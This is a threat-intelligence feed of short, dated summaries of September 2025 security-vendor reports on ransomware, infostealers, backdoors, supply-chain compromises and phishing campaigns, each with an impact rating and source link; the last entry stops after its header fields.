Intel Name:: Akira_Ransomware_Exploits_SonicWall_VPN

Date of Scan:: 2025-09-18

Impact:: HIGH

Summary:: Huntress researchers discovered that the Akira ransomware group gained access to a company’s network by exploiting a SonicWall VPN device. Once inside, the attackers found a plaintext file on a user’s desktop that contained recovery codes which they used to impersonate the legitimate account inside the portal. Leveraging this access, the group disabled alerts and uninstalled agents to evade detection. Simultaneously, they executed administrative commands to delete shadow copies across multiple systems, preparing the environment for their ransomware payload. Akira ransomware tampered with certificate stores on a Domain Controller to maintain long-term access. Although, the overall damage was contained, the attackers had sufficient control to potentially encrypt or extort the entire organization.

Source: https://www.huntress.com/blog/dangers-of-storing-unencrypted-passwords

Intel Source:: ASEC

Intel Name:: Infostealer_Surge_via_SEO_and_Domain_Abuse

Date of Scan:: 2025-09-17

Impact:: MEDIUM

Summary:: Researchers at ASEC have observed a surge in infostealer activity throughout August 2025, driven by campaigns distributing LummaC2, ACRStealer, and Rhadamanthys. Threat actors continue to disguise malware as cracks and keygens, relying on SEO poisoning to ensure their content appears prominently in search results. Beyond illicit download sites, actors have expanded to legitimate platforms such as Chromium.org issue trackers, SlideShare, and Slack Marketplace, embedding malicious links into trusted ecosystems that increase the likelihood of user engagement. The report highlights that the vast majority of samples were delivered as executables, while a smaller but notable share leveraged DLL side-loading to bypass defenses by masquerading as legitimate files. ACRStealer demonstrates a particularly concerning evolution, adopting domain masquerade techniques by modifying HTTP headers to mimic legitimate vendor domains and later shifting to more complex subdomains, complicating detection.

Source: https://asec.ahnlab.com/en/90154/

Intel Source:: IC3.gov

Intel Name:: UNC6040_and_UNC6395_Salesforce_Data_Exfiltration

Date of Scan:: 2025-09-17

Impact:: HIGH

Summary:: The FBI reports that cyber-criminal groups UNC6040 and UNC6395 are actively breaching organisation’s Salesforce environments to steal large datasets and demand extortion payments. UNC6040 uses vishing techniques against call-center employees to obtain login credentials and MFA codes, then convinces victims to approve a malicious application that gives the attackers direct API access. They use this access to export bulk customer records and later demand cryptocurrency payments, often under the ShinyHunters name. On the other hand, UNC6395 abused OAuth tokens from Salesforce chatbot integrations to maintain long-term access until those tokens were revoked in August 2025 Both groups focus on selling or extorting stolen data rather than disrupting operations, and their methods bypass normal login, MFA, and security monitoring, making detection difficult. The attacks have impacted organizations across multiple industries, exposing sensitive customer data, intellectual property, and communications.

Source: https://www.ic3.gov/CSA/2025/250912.pdf

Intel Source:: Polyswarm

Intel Name:: NotDoor_Malware

Date of Scan:: 2025-09-17

Impact:: HIGH

Summary:: PolySwarm researchers have discovered that the Russian-linked threat group Fancy Bear (APT28) is deploying a new backdoor, NotDoor, through Microsoft Outlook. The attack begins with a malicious VBA macro that leverages DLL side-loading via a legitimate OneDrive.exe binary to load a malicious SSPICLI.dll. Once executed, the malware injects a macro project into the victim’s Outlook profile, ensuring execute each time Outlook is launched. To evade detection, NotDoor modifies registry settings to automatically enable macros, disables security prompts, and employs obfuscation techniques such as randomized variable names. The backdoor provides attackers with covert capabilities to execute commands, upload files, and exfiltrate data, triggered by specially crafted emails with subjects such as “Daily Report.” Its communication with attacker-controlled server using encoded PowerShell commands that blend with legitimate traffic. This campaign is targeting multiple sectors across NATO countries, posing significant risks to sensitive government, defense, and critical infrastructure data.

Source: https://blog.polyswarm.io/fancy-bear-uses-notdoor-to-target-nato-countries

Intel Source:: Darktrace

Intel Name:: Oyster_Backdoor_via_SEO_Poisoning

Date of Scan:: 2025-09-17

Impact:: HIGH

Summary:: Researchers at Darktrace have identified a campaign where threat actors leveraged search engine poisoning to distribute the Oyster backdoor through trojanized PuTTY installers. Oyster, also known as Broomstick or CleanUpLoader, is a C++ malware first seen in 2023 and widely adopted by ransomware groups as an initial access tool. The campaign manipulates search rankings and sponsored ads to lure users into downloading a functional PuTTY client bundled with Oyster, a technique that disproportionately risks IT administrators with elevated privileges. Once installed, the malware establishes persistence through scheduled tasks and DLL side-loading, enabling remote command execution and file transfers.

Source: https://www.darktrace.com/blog/seo-poisoning-and-fake-putty-sites-darktraces-investigation-into-the-oyster-backdoor

Intel Source:: Seqrite

Intel Name:: HijackLoader_CAPTCHA_Phishing_Loader_Campaign

Date of Scan:: 2025-09-16

Impact:: HIGH

Summary:: Researchers at Seqrite have identified a CAPTCHA-protected phishing campaign that delivers the HijackLoader malware through fake installers, malvertising, and SEO poisoning tactics . The attack starts with a deceptive web page that persuades users to download an HTA file, which functions as the initial downloader . This downloader launches a series of heavily obfuscated PowerShell scripts that decode additional stages while resisting static analysis . The chain culminates in a packed .NET executable that injects a protected DLL into memory to execute the final payload . Throughout the process, the loader employs advanced evasion such as process doppelganging, DLL unhooking, direct syscalls under WOW64, call-stack spoofing, and anti-virtualization checks . On completion, the final stage contacts command-and-control infrastructure to retrieve information-stealing malware such as NekoStealer, enabling credential theft and data exfiltration .

Source: https://www.seqrite.com/blog/deconstructing-a-cyber-deception-an-analysis-of-the-clickfix-hijackloader-phishing-campaign/

Intel Source:: ANY.RUN

Intel Name:: Lazarus_Expands_Attacks_via_Dev_and_Supply_Chains

Date of Scan:: 2025-09-16

Impact:: HIGH

Summary:: Researchers from ANY.RUN have identified that North Korea’s Lazarus Group significantly expanded its operations in 2025, combining advanced social engineering tactics with supply-chain compromises to breach technology and cryptocurrency firms. By impersonating legitimate remote developers, the group gains insider access to corporate networks, exfiltrates sensitive data, and monetizes its access through fraud and extortion. In parallel, Lazarus is weaponizing open-source ecosystems, with over 230 backdoored GitHub and PyPI packages infiltrating more than 36,000 organizations, demonstrating their capability to scale attacks across software supply chains. The group employs three modular toolsets: InvisibleFerret for keylogging and command-and-control, OtterCookie for token and wallet theft, and PyLangGhost for full remote access, enabling credential harvesting, long-term espionage, and rapid lateral movement. Notable incidents include a $1.5 billion cryptocurrency theft from ByBit, initiated through a malicious Docker project that ultimately compromised AWS S3 resources. Techniques such as fake job interviews, trojanized Zoom installers, and deceptive "ClickFix" error pages are used to lower user defenses and evade detection.

Source: https://any.run/cybersecurity-blog/lazarus-group-attacks-2025/

Intel Source:: 360 Advanced Threat Research Institute

Intel Name:: APT_C_24_Shortcut_Delivered_Obfuscated_Loader

Date of Scan:: 2025-09-15

Impact:: MEDIUM

Summary:: Researchers at 360 Advanced Threat Research Institute have observed the Sidewinder (APT-C-24) group distributing ZIP archives that contain Windows shortcut files to initiate a multilayer attack chain. The LNKs invoke a native scripting host to retrieve heavily obfuscated JScript from attacker infrastructure. This script decrypts and executes a C# payload directly in memory, giving the adversary remote control of the host without writing binaries to disk. The loader conducts environment checks for CPU, RAM and security processes to evade sandboxes and endpoint protection tools. After establishing persistence, it communicates with frequently changing command-and-control domains to receive follow-on modules. Sidewinder has shifted from earlier document-based exploits to this shortcut-only delivery, increasing execution success on fully patched systems. Targeting remains centred on government, defence and energy organisations in South Asian countries, suggesting a strategic intelligence-collection motive.

Source: https://www.ctfiot.com/270213.html

Intel Source:: ASEC

Intel Name:: D4RK_4RMY_Aug_2025_Financial_Sector_Attacks

Date of Scan:: 2025-09-15

Impact:: MEDIUM

Summary:: Researchers at AhnLab have observed multiple financially-motivated and hacktivist actors mounting high-impact operations against Asian and Middle-East banking entities in August 2025. The ransomware group D4RK 4RMY claims to have encrypted systems and exfiltrated 845 GB of data from a Japanese financial holding company, signalling combined disruption-and-extortion intent. Separately, actor chase461 advertised a 90 GB offshore-corporate registry leak from a Hong Kong fund-services division, exposing identification documents and financial statements. In Iraq, hacktivist collective Keymous publicised distributed-denial-of-service campaigns against three major domestic banks to advance an ideological “Hack for Humanity” agenda. Collectively, these incidents reveal intent to monetise stolen data, apply pressure through service disruption, and promote political messaging. Observed capabilities include large-scale data exfiltration, bespoke ransomware deployment, and coordinated DDoS activity.

Source: https://asec.ahnlab.com/en/90110/

Intel Source:: Checkpoint

Intel Name:: Unknown_Actor_NPM_Crypto_Heist

Date of Scan:: 2025-09-14

Impact:: HIGH

Summary:: Researchers at Check Point Research have identified a phishing-enabled supply-chain attack in which an unknown threat actor hijacked the npm account of maintainer Josh “Qix-” Junon and pushed weaponised updates to at least 18 foundational JavaScript packages. The trojanised releases embed heavily obfuscated browser code that hooks fetch, XMLHttpRequest, and window.ethereum at runtime, enabling transparent rewrites of cryptocurrency wallet addresses and transaction parameters to divert funds to attacker-controlled destinations. The affected libraries collectively receive more than two billion weekly downloads, granting the campaign extraordinary reach across open-source and enterprise codebases.

Source: https://blog.checkpoint.com/crypto/the-great-npm-heist-september-2025/

Intel Source:: DTI

Intel Name:: PoisonSeed_Targets_Enterprises_with_Phishing_Scam

Date of Scan:: 2025-09-14

Impact:: MEDIUM

Summary:: Researchers at DomainTools have investigated the e-crime actor PoisonSeed registered 21 new domains after June 1, 2025, impersonating SendGrid and related login services in a credential-harvesting campaign. These domains redirect victims through fake Cloudflare CAPTCHA pages to add legitimacy to the phishing flow. PoisonSeed is using bespoke domain infrastructure, spoofed web content, and hosting on ASN 42624 (Global-Data System IT Corp) to enable rapid credential collection and reuse in subsequent attacks. The group’s tactics, particularly the CAPTCHA ruse and choice of registrar and ASN, closely resemble those used by SCATTERED SPIDER, suggesting possible shared tooling or personnel. While no specific victims are currently named, PoisonSeed has previously targeted cryptocurrency platforms and enterprise environments, indicating a broad attack surface. Successful compromise could result in lateral movement, data theft, cryptocurrency exfiltration, and extortion, posing significant operational and financial risks to affected organizations.

Source: https://dti.domaintools.com/newly-identified-domains-likely-linked-to-continued-activity-from-poisonseed-e-crime-actor/

Intel Source:: Reliaquest

Intel Name:: Attackers_Exploit_Axios_for_Automated_Phishing_Attacks

Date of Scan:: 2025-09-13

Impact:: MEDIUM

Summary:: ReliaQuest researchers have identified a new phishing technique where attackers abuse the JavaScript HTTP client Axios as a fake user-agent to automate credential phishing workflows. These campaigns rely on Microsoft Direct Send for delivery and use Axios-scripted HTTP requests to steal credentials, bypass MFA, and manipulate APIs. Once victims enter their details, attackers can steal session tokens to replay Azure authentication flows, effectively bypassing MFA and gaining access to sensitive APIs. Early attacks focused on executives in finance, healthcare, and manufacturing but the campaign has since expanded to general users, showing its scalability. To avoid detection, phishing emails often embed QR codes that redirect through disposable .es domains and Firebase links.

Source: https://reliaquest.com/blog/threat-spotlight-attackers-exploit-axios-for-automated-phishing/

Intel Source:: ASEC

Intel Name:: CyberVolk_Dual_Encryption_and_Fake_Decryption_Technique

Date of Scan:: 2025-09-13

Impact:: HIGH

Summary:: Researchers at ASEC have observed a ransomware group called CyberVolk, which first emerged in May 2024, leveraging own custom-built ransomware payload that that renders files permanently unrecoverable by applying double encryption with AES-256-GCM and ChaCha20-Poly1305 and offers deceptive decryption routine that permanently denies data recovery. The malware restarts itself with administrator rights to gain maximum access to files, while avoiding critical system directories to ensure the operating system remains functional. So far, CyberVolk has targeted government bodies, critical infrastructure, and scientific institutions in Japan, France, and the UK. The ransom demands payment in Bitcoin and offers only a single communication channel, reflecting a streamlined extortion model. Although there is no evidence of spreading across networks or data exfiltration, the campaign demonstrates a clear focus on host-level disruption.

Source: https://asec.ahnlab.com/ko/90033/

Intel Source:: PointWild

Intel Name:: New_Buterat_Backdoor_Malware

Date of Scan:: 2025-09-13

Impact:: MEDIUM

Summary:: PointWild researchers have identified a new Windows-based backdoor dubbed Buterat, designed to provide attackers with long-term and covert access to compromised systems. The malware establishes encrypted C2 communications, executes arbitrary commands, harvests credentials, exfiltrates data, and deploys additional DLL or EXE payloads. It employs obfuscated strings and API-level thread injection to evade detection, while masquerading itself as legitimate processes and maintaining persistence through registry modifications. Initial access has been observed via phishing campaigns and trojanized downloads, with targets spanning both enterprise and government networks. Although no destructive functionality have been reported, Buterat’s capabilities make it well-suited for ransomware, espionage, or extortion operations.

Source: https://www.pointwild.com/threat-intelligence/analysis-of-backdoor-win32-buterat

Intel Source:: Jamf

Intel Name:: ChillyHell_macOS_Backdoor

Date of Scan:: 2025-09-13

Impact:: HIGH

Summary:: Researchers from Jamf have uncovered that ChillyHell, a developer-signed and Apple notarized C++ backdoor that has been covertly targeting macOS systems since at least 2021. The malware is modular and highly capable that allow attackers to execute remote commands, steal files, harvest credentials, and even perform brute-force password attacks. ChillyHell establishes persistence through user-level LaunchAgents, root-level LaunchDaemons and shell profile injection, and it manipulates file timestamps to evade detections. Its C2 operations leverage both HTTPS and DNS TXT records, constantly checking for new commands to execute. Notably, the malware has been used in targeted campaigns against Ukrainian government officials, indicating a focus on high-value geopolitical intelligence. If successfully deployed, ChillyHell enables long-term surveillance, credential theft, and lateral movement within macOS environments.

Source: https://www.jamf.com/blog/chillyhell-a-modular-macos-backdoor/

Intel Source:: Zscaler

Intel Name:: kkRAT_Crypto_Stealing_RAT_Uses_BYOVD

Date of Scan:: 2025-09-13

Impact:: MEDIUM

Summary:: Researchers at Zscaler ThreatLabz have observed a multi-stage malware campaign that deploys kkRAT together with ValleyRAT and FatalRAT. The operation begins with fake software installers that deliver shellcode stages culminating in a vulnerable-driver technique to disable local security products and sideload the RAT. Once resident, kkRAT registers with its command-and-control server, transmitting detailed host fingerprinting data and loading an encrypted plugin framework. Available commands provide remote desktop control, interactive shell execution, process and network enumeration, SOCKS5 proxy tunnelling and clipboard manipulation that swaps cryptocurrency wallet addresses. Persistence options include scheduled tasks, registry Run keys, startup shortcuts and logon scripts.

Source: https://www.zscaler.com/blogs/security-research/technical-analysis-kkrat

Intel Source:: Seqrite

Intel Name:: Malware_Campaign_Drop_XWorm_and_Remcos_RAT

Date of Scan:: 2025-09-12

Impact:: HIGH

Summary:: Seqrite researchers have uncovered a phishing campaign that delivers XWorm and Remcos RAT through ZIP and SVG attachments containing obfuscated BAT scripts The attack begins with a BAT script that establishes persistence in the Windows Startup folder and launches a PowerShell stager that disables AMSI and ETW, executes payloads entirely in memory to evade detections. The attack uses multiple loader stages to decrypt and execute .NET assemblies that deploy XWorm or Remcos RATs for enabling remote command execution, keylogging, credential theft, and data-exfiltration. The attackers also abuse CDNs such as ImageKit to host intermediate payloads. The campaign appears opportunistic, targeting any vulnerable Windows endpoints, and successful compromise can give attackers administrative control and enable lateral movement across networks.

Source: https://www.seqrite.com/blog/xworm-remcos-bat-svg-malware-analysis/

Intel Source:: ASEC

Intel Name:: BlackNevas_Double_Extortion_Ransomware

Date of Scan:: 2025-09-12

Impact:: MEDIUM

Summary:: Researchers at AhnLab ASEC have observed the BlackNevas ransomware group conducting coordinated double-extortion attacks against organizations worldwide. The actors deploy a bespoke Windows payload that encrypts files with AES and safeguards the session key with embedded RSA, sharply limiting prospects for key recovery. Campaign telemetry shows victims across multiple industries, including critical infrastructure operators, with a concentration in the Asia-Pacific region and additional incidents in Europe and North America. BlackNevas is operated as a closed crew rather than a public affiliate program, allowing the same team to manage intrusion, exfiltration, encryption and negotiation phases. The binary accepts runtime switches such as /fast, /stealth and /shdwn that let operators calibrate speed, visibility and end-state impact. Default behaviour encrypts only a portion of each file and purposefully skips core system paths to preserve host stability and maximise leverage.

Source: https://asec.ahnlab.com/en/90080/

Intel Source:: Akamai

Intel Name:: Karuizawa_Malware

Date of Scan:: 2025-09-12

Impact:: HIGH

Summary:: Akamai researchers have identified a new Docker-targeting malware strain called Karuizawa, which exploits unauthenticated Docker Engine APIs to gain root-level access by mounting the host file system. Once inside, it uses a Tor-delivered script to establish persistence via SSH, restrict access to the Docker API, and deploy additional tools. These include masscan for scanning other vulnerable hosts and a custom Go-based dropper that profiles active users, spreads the infection, and triggers additional payloads. Unlike earlier versions that primarily focused on cryptocurrency mining, this variant is designed to build a botnet, extending its reach by exploiting Telnet and Chrome debugging ports. It can steal credentials, exfiltrate cookies, and abuse hijacked browsers to generate distributed DDoS traffic through Chromedp automation.

Source: https://www.akamai.com/blog/security-research/new-malware-targeting-docker-apis-akamai-hunt

Intel Source:: Seqrite

Intel Name:: CVE_2025_31324_SAP_NetWeaver_RCE

Date of Scan:: 2025-09-12

Impact:: HIGH

Summary:: Researchers at Seqrite have observed a surge in exploitation of CVE-2025-31324, an unauthenticated file-upload flaw in SAP NetWeaver Development Server that enables remote code execution. Attackers are leveraging the weakness to implant web shells and custom backdoors, obtaining full control of vulnerable servers. With this foothold, they pivot laterally, harvest credentials and exfiltrate sensitive business data. Confirmed incidents involve manufacturing, retail and telecom enterprises, where disruptions to SAP-driven workflows were reported. Public release of an exploit tool in August 2025 accelerated mass scanning and automated compromise activity.

Source: https://www.seqrite.com/blog/cve-2025-31324-sap-vulnerability-protection/

Intel Source:: LevelBlue

Intel Name:: AsyncRAT_Fileless_RAT_via_ScreenConnect

Date of Scan:: 2025-09-11

Impact:: MEDIUM

Summary:: Researchers at LevelBlue have identified attackers abusing a trojanized ScreenConnect installer to deliver an in-memory variant of AsyncRAT, enabling covert credential and crypto-wallet theft on Windows hosts. The multilayer VBScript-PowerShell loader disables AMSI and ETW telemetry, then registers a fake “Skype Updater” scheduled task so the RAT survives reboots without leaving an executable on disk. Once active, AsyncRAT maintains TLS-encrypted command-and-control, fingerprints the host, and exfiltrates browser passwords, key-logs, clipboard data, and wallet files. Operators can remotely push plug-ins that kill security processes or run arbitrary commands, providing durable control. The tooling requires only local-administrator privileges and leverages legitimate remote-support software, complicating detection.

Source: https://cyber.levelblue.com/m/5542a17fd05a0c46/original/TTR-Spotlight-AsyncRAT-in-Action.pdf

Intel Source:: TahirSec

Intel Name:: Patchwork_DarkSamural_false_flag_Mythic_RAT

Date of Scan:: 2025-09-10

Impact:: MEDIUM

Summary:: Researchers at TahirSec have identified the India-nexus APT Patchwork masquerading as the Vietnam-linked “Dark Samural” subgroup of OceanLotus to divert attribution. The campaign begins with spear-phishing emails carrying .msc files that abuse GrimResource to execute multilayer-obfuscated JavaScript and retrieve payloads. Once triggered, the scripts sideload a weaponised DLL to establish a Mythic remote-access agent that communicates over HTTPS with cloud-hosted C2 infrastructure using AES-GCM encryption. The malware creates scheduled tasks for persistence, employs white-plus-black DLL chaining for defence evasion, and steals browser master keys to exfiltrate credentials and other sensitive data. Historical patterns show Patchwork prioritising military, diplomatic, education and research entities, and this wave currently focuses on Pakistan. The toolset includes both proprietary (BADNEWS) and open-source (AsyncRAT, QuasarRAT, Mythic) implants, underscoring a flexible but proven capability set.

Source: https://www.ctfiot.com/269659.html

Intel Source:: The DFIR Report

Intel Name:: Multi_Affiliate_TA_Ransomware_Prep_via_SectopRAT

Date of Scan:: 2025-09-10

Impact:: HIGH

Summary:: Researchers at The DFIR Report have observed a multi-affiliate threat actor leveraging a trojanized desktop-utility installer to gain an initial foothold, deploying a remote-access trojan and proxy malware. The operator swiftly created a local administrator account, established persistence, and pivoted via RDP from the initial host to the domain controller, backup server, and file servers. They harvested credentials through Veeam database dumping, directory-replication abuse, and memory-scraping techniques. Detailed network and Active Directory reconnaissance was carried out with a mix of open-source tools and custom binaries. Sensitive file-share data was archived and exfiltrated over plain-text FTP to external cloud infrastructure. Infrastructure and tooling overlap links the intrusion to the Play, RansomHub, and DragonForce ransomware ecosystems, indicating an affiliate experienced across multiple RaaS programmes.

Source: https://thedfirreport.com/2025/09/08/blurring-the-lines-intrusion-shows-connection-with-three-major-ransomware-gangs/

Intel Source:: Aikido

Intel Name:: Unknown_Actor_Hijacks_NPM_Packages_to_Steal_Crypto_Funds

Date of Scan:: 2025-09-10

Impact:: MEDIUM

Summary:: Researchers at Aikido have discovered that an unidentified actor hijacked the maintainer accounts of 18 highly popular npm packages, including chalk and debug . The attacker uploaded new, trojanized versions that embed heavily obfuscated JavaScript. Once a tainted library is loaded in a browser-based web application, the code hooks fetch, XMLHttpRequest, and several wallet APIs to monitor outbound blockchain transactions . When it detects cryptocurrency transfers, it transparently rewrites destination addresses to those controlled by the threat actor, diverting funds without user awareness . The implant further alters on-screen text to display look-alike wallet strings, masking the fraud from manual review. Collectively, the compromised packages receive more than two billion weekly downloads, giving the campaign extraordinary reach and the potential for silent, large-scale financial loss.

Source: https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised

Intel Source:: Trend Micro

Intel Name:: The_Gentlemen_Enterprise_Wide_Double_Extortion

Date of Scan:: 2025-09-10

Impact:: HIGH

Summary:: Researchers at Trend Micro have identified a previously undocumented ransomware crew dubbed “The Gentlemen,” first observed in August 2025. The group rapidly attained domain-administrator control in multiple victim environments and pushed a custom, password-protected ransomware payload through the NETLOGON share to encrypt every Windows host. Operators paired the encryption phase with bulk theft of internal data over encrypted WinSCP tunnels, enabling a double extortion model that pressures organisations to pay. They exhibited strong intent and capability by abusing a signed, vulnerable driver to kill security agents, tailoring successive anti-AV binaries to each endpoint stack encountered, and manipulating Group Policy Objects for domain-wide persistence. Lateral movement relied on PsExec, AnyDesk and compromised FortiGate VPN credentials, demonstrating fluid use of both living-off-the-land tools and bespoke malware.

Source: https://www.trendmicro.com/en_us/research/25/i/unmasking-the-gentlemen-ransomware.html

Intel Source:: Virustotal

Intel Name:: Weaponized_SVGs_Target_Colombia_with_Phishing

Date of Scan:: 2025-09-09

Impact:: MEDIUM

Summary:: Researchers at VirusTotal have uncovered an email-borne campaign in which unknown actors distribute weaponized SVG attachments that mimic a Colombian judicial-system portal and covertly deliver a malicious ZIP payload. All 44 discovered samples initially evaded every antivirus engine on VirusTotal, with the SVGs executing obfuscated JavaScript that decodes a Base64-encoded phishing page to trick victims and extracts another Base64 string to automatically download the malware archive. To bypass detection, the attackers use polymorphism, large dummy code blocks, and Spanish-language comments such as “POLIFORMISMO\_MASIVO\_SEGURO” and “Funciones dummy MASIVAS.” The first known sample appeared in Colombia on 14 August 2025, and file sizes have since decreased, suggesting payload optimization. Victimology indicates a focus on Colombian organisations and citizens, exploiting trust in Fiscalía General de la Nación branding. With its combination of realistic phishing lures, automated malware delivery, and sophisticated obfuscation, the campaign poses a credible risk of initial access, enabling credential theft, secondary payload staging, and broader compromise.

Source: https://blog.virustotal.com/2025/09/uncovering-colombian-malware-campaign.html

Intel Source:: Polyswarm

Intel Name:: Multiple_Ransomware_Groups_2025_Attacks_on_Healthcare

Date of Scan:: 2025-09-09

Impact:: HIGH

Summary:: Researchers at PolySwarm have observed a coordinated surge of ransomware activity against the global healthcare sector during 2025 . Threat actors including INC, Akira, Qilin, INTERLOCK, Rhysida and several others leveraged phishing emails, unpatched systems and supply-chain footholds to secure initial access. Post-compromise toolsets such as Cobalt Strike beacons, Mimikatz credential dumps and Rclone data movers enabled persistence, privilege escalation and large-scale exfiltration before files were encrypted. Victim organisations faced double-extortion ransom notes demanding multi-million-dollar Bitcoin payments under the threat of public leaks of stolen patient data. At least 50 confirmed incidents in the United States alone exposed more than 3.2 million personal health records, while parallel intrusions in Europe and Asia forced ambulance diversions, cancelled surgeries and, in one UK hospital, contributed to a patient fatality.

Source: https://blog.polyswarm.io/recent-ransomware-threats-to-the-healthcare-vertical?utm_campaign=Hivemind%20Reporting&utm_medium=email&_hsmi=379568764&utm_content=379568764&utm_source=hs_email

Intel Source:: Socket

Intel Name:: Malicious_NPM_Package_Targets_Crypto_Users

Date of Scan:: 2025-09-09

Impact:: MEDIUM

Summary:: Researchers from Socket have identified a malicious npm package masquerading as the Nodemailer library. Once installed, the package leverages Electron tools to secretly unpack and manipulate Atomic and Exodus cryptocurrency wallets on Windows. It injects hidden JavaScript code that redirects outgoing crypto transactions to attacker-controlled wallets. The attacker’s npm account is newly created, and package downloads remain limited, indicating the campaign is still in its early stages. However, its spreads through a supply-chain vector, the threat has the potential to impact many users. The malware persists until victims reinstall their wallets from official sources, and successful attacks result in the immediate theft of cryptocurrency.

Source: https://socket.dev/blog/wallet-draining-npm-package-impersonates-nodemailer?utm_medium=feed

Intel Source:: The Raven File

Intel Name:: Alviva_Infrastructure_Linked_to_Cybercrime_Groups

Date of Scan:: 2025-09-09

Impact:: HIGH

Summary:: Researchers at the Raven File have identified that infrastructure owned by Alviva Holding Ltd is being consistently leveraged by high-profile cybercriminal groups, particularly the Clop ransomware gang. Recent analysis of newly registered Clop contact domains shows they resolve to IP addresses within autonomous systems (AS209132 and AS209272) registered to Alviva. Historical abuse data links these ASNs to malicious activity such as Cobalt Strike beacons, malware distribution, and DDoS services spanning more than a decade. Corporate records list Alviva’s headquarters at a Seychelles address also used by multiple shell companies named in the Pandora Papers and connected to the now-blacklisted Alpha Consulting network. Beneficial ownership tracing points to Russian national Denis Nachaev, indicating efforts to obscure true control and financial operations. Alviva’s infrastructure—featuring stable IP allocations, permissive abuse handling, and peering with other bulletproof hosting providers—offers ransomware operators dependable command-and-control channels, victim communication platforms, and data-leak hosting.

Source: https://theravenfile.com/2025/09/08/uncovering-alviva-holding-links-to-russian-shell-companies-and-cybercrime/

Intel Source:: Zscaler

Intel Name:: APT37_Target_Windows_via_Rust_Backdoor_and_Python_Loader

Date of Scan:: 2025-09-08

Impact:: MEDIUM

Summary:: Zscaler researchers have uncovered a new cyber-espionage campaign conducted by APT37, a North Korea-linked threat group active since at least 2012. The group leverages a custom Rust-based backdoor called Rustonott, delivered through a Python loader and controlled via a single C2 server. The malware is designed to provide attackers long-term, covert access to Windows systems along with capabilities of file theft, keylogging, screen and audio recording, registry changes, and scheduled task creation. Victims identified in this campaign are primarily individuals in South Korea involved in political and diplomatic affairs related to North Korea, showing the campaign’s focus on intelligence gathering. The infrastructure enables real-time surveillance and data collection, further emphasizing the actor’s focus on espionage rather than disruption.

Source: https://www.zscaler.com/blogs/security-research/apt37-targets-windows-rust-backdoor-and-python-loader

Intel Source:: GitGuardian

Intel Name:: The_GhostAction_Campaign

Date of Scan:: 2025-09-08

Impact:: MEDIUM

Summary:: GitGuardian researchers have uncovered GhostAction, a large-scale supply chain campaign that exploits GitHub Actions workflows to steal developer credentials. The threat actors inject malicious YAML files into 327 GitHub accounts across 817 repositories, leading to the exfiltration of more than 3,300 tokens associated with PyPI, npm, DockerHub, AWS, and various databases during automated CI runs. These stolen credentials enable attackers to publish backdoored packages, escalate privileges within cloud environments, and move laterally into production systems. The identical malicious payloads spread across projects in Python, Rust, JavaScript, and Go, highlighting the campaign’s broad impact on the software ecosystem.

Source: https://blog.gitguardian.com/ghostaction-campaign-3-325-secrets-stolen/

Intel Source:: Bitdefender

Intel Name:: SafePay_Ransomware

Date of Scan:: 2025-09-08

Impact:: HIGH

Summary:: Bitdefender has identified a new ransomware strain dubbed SafePay, which has impacted over 270 organizations since its emergence in late 2024. The group is notable for its speed, often moving from initial access to full encryption and public victim disclosure within 24 hours. SafePay operators gain initial access through stolen or brute-forced credentials, VPN attacks, or social engineering that impersonates IT staff. Once inside, they leverage tools such as ShareFinder for network discovery, PsExec for lateral movement, and WinRAR and FileZilla for data exfiltration. The ransomware employs ChaCha20 encryption, appends the .safepay extension, deletes shadow copies, and drops a ransom note named readme_safepay.txt. Victims have been observed in the United States, Germany, the United Kingdom, and Canada, with manufacturing, healthcare, and construction sectors most affected. Ransom demands are tailored to organizational revenue and can reach tens of millions of dollars.

Source: https://www.bitdefender.com/en-us/blog/businessinsights/safepay-ransomware-attacks-ttps

Intel Source:: Arcticwolf

Intel Name:: GPUGate_Malware_GPU_Gated_Malvertising_Campaign

Date of Scan:: 2025-09-08

Impact:: HIGH

Summary:: Researchers at Arctic Wolf have observed a Russian-speaking threat actor distributing a trojanized GitHub Desktop installer, dubbed GPUGate, through malicious Google Ads that redirect victims to look-alike download portals. The oversized 128 MB MSI is padded with legitimate binaries to evade sandbox size checks and embeds a .NET loader that decrypts its payload only when it detects a discrete GPU whose device name exceeds ten characters, defeating most virtual analysis environments. Upon execution the installer requests a single UAC prompt, implants itself under %APPDATA%, disables Microsoft Defender scanning for its directory, and schedules a high-privilege task for persistence. A follow-on PowerShell script retrieves stage-two ZIP archives that enable DLL sideloading and can deploy additional payloads, including the AMOS information-stealer on macOS hosts. Campaign telemetry highlights selective targeting of Western European IT professionals, particularly software developers, implying an initial-access objective focused on credential theft and potential supply-chain compromise.

Source: https://arcticwolf.com/resources/blog/gpugate-malware-malicious-github-desktop-implants-use-hardware-specific-decryption-abuse-google-ads-target-western-europe/

Intel Source:: Seqrite

Intel Name:: NoisyBear_Phishing_Hits_Kazakhstan_Oil_and_Gas

Date of Scan:: 2025-09-07

Impact:: HIGH

Summary:: Researchers at Seqrite Labs have identified a spear-phishing campaign, codenamed Operation BarrelFire, that delivers multi-stage payloads to employees of Kazakhstan’s national oil firm, KazMunaiGas. The NoisyBear actor uses a compromised business email to send ZIP archives containing a decoy salary document and a malicious LNK shortcut. When executed, the chain downloads batch scripts and custom PowerShell loaders (“DOWNSHELL”) that disable AMSI scanning and inject a Meterpreter reverse shell into explorer.exe. Subsequent reflective DLL loading hijacks a suspended rundll32.exe thread to maintain control.

Source: https://www.seqrite.com/blog/operation-barrelfire-noisybear-kazakhstan-oil-gas-sector/

Intel Source:: Google Cloud (Mandiant)

Intel Name:: Sitecore_CVE_2025_53690_Exploitation_Campaign

Date of Scan:: 2025-09-07

Impact:: HIGH

Summary:: Researchers at Mandiant have identified an active exploitation campaign targeting Sitecore deployments vulnerable to CVE-2025-53690, a ViewState deserialization zero-day. Attackers leveraged an exposed ASP.NET machine key, published in older Sitecore deployment guides, to achieve remote code execution on internet-facing instances. Following compromise, they deployed WEEPSTEEL, a reconnaissance malware masquerading as a benign ViewState payload, to extract host and network data. The adversary then escalated privileges by creating local administrator accounts and deployed tools including DWAGENT and EARTHWORM to enable persistence, tunneling, and command-and-control. Credential dumping via SYSTEM and SAM hives, token theft attempts using GoTokenTheft, and Active Directory reconnaissance with SHARPHOUND were observed, alongside lateral movement through RDP sessions.

Source: https://cloud.google.com/blog/topics/threat-intelligence/viewstate-deserialization-zero-day-vulnerability

Intel Source:: Cyfirma

Intel Name:: Salat_Stealer

Date of Scan:: 2025-09-07

Impact:: HIGH

